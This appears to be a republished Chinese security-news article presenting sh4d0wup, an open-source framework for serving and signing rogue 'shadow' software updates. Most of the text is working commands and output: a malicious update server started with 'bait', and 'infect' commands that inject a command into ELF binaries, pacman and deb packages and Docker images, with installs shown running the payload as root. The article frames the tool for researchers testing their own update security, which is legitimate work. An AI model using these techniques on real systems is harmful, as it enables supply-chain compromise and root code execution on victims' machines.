sh4d0wup:一款功能强大的签名密钥与更新漏洞利用框架
2023-5-31 21:5:32 Author: FreeBuf(查看原文) 阅读量:18 收藏

 关于sh4d0wup 

你有没有想过,你下载的更新是其他人都得到的更新,还是你得到的只是为你做的不同的更新?sh4d0wup是一款功能强大的签名密钥与更新漏洞利用框架,而sh4d0wup名字主要针对的是Shadow update(影子更新)。

所谓Shadow update,是指官方不存在的更新,但带有有效签名,并会被客户视为真实的更新。如果签名密钥被黑客泄露,或者拥有合法访问权限的发布工程师想做坏事的话,就会发生这种情况。

sh4d0wup本质上是一个http/https更新服务器,在合法服务器面前充当反向代理,可以感染并签署各种工具、文件或代码格式。广大研究人员可以使用该工具来研究和测试自己系统的更新机制是否安全健壮。

 工具下载 

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/kpcyrd/sh4d0wup.git

(向右滑动,查看更多

 编译一个Plot  

某些Plot的运行非常复杂,为了避免工具配置时间过长,我们可以预先构建好一个Plot,并提前创建好签名:

sh4d0wup build ./contrib/plot-hello-world.yaml -o ./plot.tar.zst
(向右滑动,查看更多)

 运行一个Plot 

下列命令将会根据Plot配置生成一个恶意HTTP更新服务器,并接收YAML文件:

sh4d0wup bait -B 0.0.0.0:1337 ./plot.tar.zst

(向右滑动,查看更多

下面给出的是YAML文件样例:

contrib/plot-archlinux.yaml:https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-archlinux.yaml

contrib/plot-debian.yaml:https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-debian.yaml

contrib/plot-rustup.yaml:https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-rustup.yaml

contrib/plot-curl-sh.yaml:https://github.com/kpcyrd/sh4d0wup/blob/main/contrib/plot-curl-sh.yaml

 感染一个文件 

sh4d0wup infect elf

% sh4d0wup infect elf /usr/bin/sh4d0wup -c id a.out
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Spawning C compiler...
[2022-12-19T23:50:52Z INFO sh4d0wup::infect::elf] Generating source code...
[2022-12-19T23:50:57Z INFO sh4d0wup::infect::elf] Waiting for compile to finish...
[2022-12-19T23:51:01Z INFO sh4d0wup::infect::elf] Successfully generated binary
% ./a.out help
uid=1000(user) gid=1000(user) groups=1000(user),212(rebuilderd),973(docker),998(wheel)
Usage: a.out [OPTIONS] <COMMAND>
Commands:
bait 开启一台恶意更新服务器
infect 高级篡改模式,将附加命令注入到代码包中
tamper 低级篡改模式,修补程序包数据库以添加恶意程序包、触发更新或影响依赖项解决方案
keygen 使用给定参数生成签名密钥
sign 使用签名密钥生成签名
hsm 与硬件签名密钥交互
build 基于Plot编译攻击行为
check 检测Plot是否仍然可以执行
completions 生成Shell脚本
  help         打印工具帮助信息
Options:
-v, --verbose... 开启调试模式
-h, --help 打印工具帮助信息

(向右滑动,查看更多

sh4d0wup infect pacman

% sh4d0wup infect pacman --set 'pkgver=0.2.0-2' /var/cache/pacman/pkg/sh4d0wup-0.2.0-1-x86_64.pkg.tar.zst -c id sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
[2022-12-09T16:08:11Z INFO sh4d0wup::infect::pacman] This package has no install hook, adding one from scratch...
% sudo pacman -U sh4d0wup-0.2.0-2-x86_64.pkg.tar.zst
loading packages...
resolving dependencies...
looking for conflicting packages...
Packages (1) sh4d0wup-0.2.0-2
Total Installed Size: 13.36 MiB
Net Upgrade Size:       0.00 MiB
:: Proceed with installation? [Y/n]
(1/1) checking keys in keyring [#######################################] 100%
(1/1) checking package integrity [#######################################] 100%
(1/1) loading package files [#######################################] 100%
(1/1) checking for file conflicts [#######################################] 100%
(1/1) checking available disk space [#######################################] 100%
:: Processing package changes...
(1/1) upgrading sh4d0wup [#######################################] 100%
uid=0(root) gid=0(root) groups=0(root)
:: Running post-transaction hooks...
(1/2) Arming ConditionNeedsUpdate...
(2/2) Notifying arch-audit-gtk

(向右滑动,查看更多

sh4d0wup infect deb

% sh4d0wup infect deb /var/cache/apt/archives/apt_2.2.4_amd64.deb -c id ./apt_2.2.4-1_amd64.deb --set Version=2.2.4-1
[2022-12-09T16:28:02Z INFO sh4d0wup::infect::deb] Patching "control.tar.xz"
% sudo apt install ./apt_2.2.4-1_amd64.deb
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Note, selecting 'apt' instead of './apt_2.2.4-1_amd64.deb'
Suggested packages:
apt-doc aptitude | synaptic | wajig dpkg-dev gnupg | gnupg2 | gnupg1 powermgmt-base
Recommended packages:
ca-certificates
The following packages will be upgraded:
apt
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 0 B/1491 kB of archives.
After this operation, 0 B of additional disk space will be used.
Get:1 /apt_2.2.4-1_amd64.deb apt amd64 2.2.4-1 [1491 kB]
debconf: delaying package configuration, since apt-utils is not installed
(Reading database ... 6661 files and directories currently installed.)
Preparing to unpack /apt_2.2.4-1_amd64.deb ...
Unpacking apt (2.2.4-1) over (2.2.4) ...
Setting up apt (2.2.4-1) ...
uid=0(root) gid=0(root) groups=0(root)
Processing triggers for libc-bin (2.31-13+deb11u5) ...

(向右滑动,查看更多

sh4d0wup infect oci

% docker pull alpine:edge
% docker save alpine:edge > alpine-edge.tar
% sh4d0wup infect oci alpine-edge.tar infected.tar -c id -t infected:latest
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Original image is referencing config "121d0da757518198deeb7d1df20aaae549834f8bc77195bbf5be1900c0144cff.json": LayerConfig { config: Some(Config { user: Some(""), exposed_ports: None, env: Some(["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"]), entrypoint: None, cmd: Some(["/bin/sh"]), volumes: None, working_dir: Some(""), labels: None, stop_signal: None }), rootfs: Some(RootFs { type: "layers", diff_ids: ["sha256:2f7048230bc73ff091490aa5764f9c160d1a4efe04935da731a22e8d5fcccfcc"] }), extra: {"container_config": Object {"AttachStderr": Bool(false), "AttachStdin": Bool(false), "AttachStdout": Bool(false), "Cmd": Array [String("/bin/sh"), String("-c"), String("#(nop) "), String("CMD [\"/bin/sh\"]")], "Domainname": String(""), "Entrypoint": Null, "Env": Array [String("PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin")], "Hostname": String("457781b778a4"), "Image": String("sha256:28d4c3ce9341a318d475e64365e47a34d5b9ba6c670bed35ce90b2402296ead6"), "Labels": Object {}, "OnBuild": Null, "OpenStdin": Bool(false), "StdinOnce": Bool(false), "Tty": Bool(false), "User": String(""), "Volumes": Null, "WorkingDir": String("")}, "architecture": String("amd64"), "created": String("2022-11-10T20:19:29.043621251Z"), "history": Array [Object {"created": String("2022-11-10T20:19:28.834390785Z"), "created_by": String("/bin/sh -c #(nop) ADD file:51c4407dc777648e8ebc8e124b05feb1807699ade513b6006a9a409f6b0f6f51 in / ")}, Object {"created": String("2022-11-10T20:19:29.043621251Z"), "created_by": String("/bin/sh -c #(nop) CMD [\"/bin/sh\"]"), "empty_layer": Bool(true)}], "os": String("linux"), "docker_version": String("20.10.12"), "container": String("457781b778a449c9eac455ca1a18300a4041cb2b0d2d3f979460d19d7632ebf7")} }
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Creating new layer in image: "patched"
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Generating filesystem layer for payload: "id"
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Updating tags of image to ["infected:latest"]
[2022-12-12T00:31:17Z INFO sh4d0wup::infect::oci] Writing modified manifest...
% docker load -i infected.tar
Loaded image: infected:latest
% docker run -it infected echo hello world
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
hello world

(向右滑动,查看更多)

 许可证协议 

本项目的开发与发布遵GPL-3.0开源许可证协议。

 项目地址 

sh4d0wuphttps://github.com/kpcyrd/sh4d0wup


文章来源: http://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651226804&idx=4&sn=f5cec06082b686957060e52edc09da7e&chksm=bd1d103f8a6a992993c8548bbd12317c49fe56bb9259d2f617b9cab207147e21034ce7100eea#rd
如有侵权请联系:admin#unsafe.sh